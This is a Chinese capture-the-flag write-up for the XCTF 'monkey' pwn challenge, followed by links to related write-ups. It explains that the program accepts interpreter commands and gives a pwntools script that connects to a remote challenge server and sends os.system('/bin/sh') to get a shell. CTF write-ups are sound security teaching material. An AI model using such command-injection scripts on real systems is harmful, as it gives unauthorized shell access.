[攻防世界 pwn]——monkey
[攻防世界 pwn]——monkey
- 题目地址:https://adworld.xctf.org.cn/
- 题目:
额,怎么说呢这道题。checksec没什么大不了的
但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下
输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以
在IDA中查看一下字符串,因为它可以输入的字符串肯定有体现,因为输入help下面就有help的提示。
发现了file,不过它前面多了个os. 再去试试加上os.之后是否可以。发现,竟然真的可以,幸好看到了file。因为这个是Linux上面的一个命令。
其实有一个最关键的暗示,就是你按上下键你会发现,你之前输入的命令可以查看。感觉就是一个终端。
exploit
from pwn import *
p = remote('111.200.241.244',37916)
context.log_level = 'debug'
p.recv()
p.sendline("os.system('/bin/sh')")
p.interactive()
[攻防世界 pwn]——monkey相关推荐
- 攻防世界 Pwn 进阶 第一页
00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
- [攻防世界 pwn]——实时数据监测
[攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...
- [攻防世界 pwn]——反应釜开关控制
[攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...
- [攻防世界 pwn]——pwn-100
[攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...
- [攻防世界 pwn]——pwn-200
[攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...
- [攻防世界 pwn]——welpwn
[攻防世界 pwn]--welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了.我想出来一个名词叫做栈连接 还是先checkse ...
最新文章
- Google Test(GTest)使用方法和源码解析——自动调度机制分析
- 常用memcached命令详解
- 《图解CSS3:核心技术与案例实战》——1.1节什么是CSS3
- 二维数组m的元素是4个字符组成的串_串、数组和广义表
- 二年级计算机认识键盘教案,关于《认识键盘》的教学反思
- 打包bat等文件成exe,双击运行不显示dos窗口,exe不报毒
- 收藏 | 李飞飞经典CS231N《卷积神经网络视觉识别》第十一讲!
- OpenShift 4 之Istio-Tutorial (11) 控制Egress访问
- java集合迭代器_java集合迭代器
- 基于JAVASCRIPT操作XML的无刷新分页
- 数据库敏感数据加密技术
- 最好的磁盘管理工具Acronis Disk Director Suite 10.0英文原版 + 注册机 + 使用图文介绍
- 超全——一般照片、图片的尺寸、大小、像素
- 互联网行业哪个职业比较有前途?
- 【Unity】 HTFramework框架(十)Resource资源管理器
- 两年制大专计算机网络技术,湖南都市五年制大专_计算机网络技术专业_2021年报名...
- 使用WIFI通讯,手机秒变单片机大屏显示器
- 古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?
- 划分vlan实验心得体会_计算机网络实验心得体会_计算机网络实验工作感想
- 一个人的时候,学会坦然。
热门文章
- 泛型--定制泛型接口、泛型类--介绍篇
- 编写高性能Web应用程序的10个技巧
- 关于 MSDN 收藏夹
- [python爬虫] Selenium高级篇之窗口移动、弹出对话框自登录
- iOS之深入解析KVO的底层原理
- 【数据结构与算法】之深入解析“填充每个节点的下一个右侧节点指针”的求解思路与算法示例
- 内存(Display)、显示器(Monitor)和计算机(Computer)均属于一种产品(Product),其中计算机需要显示器和内存。请用Python语言简要实现这些类及它们之间的关系。
- Win10怎么设置虚拟内存?
- Java单层循环实现输出九九乘法表
- 【STM32】程序下载(ST-LINK V2)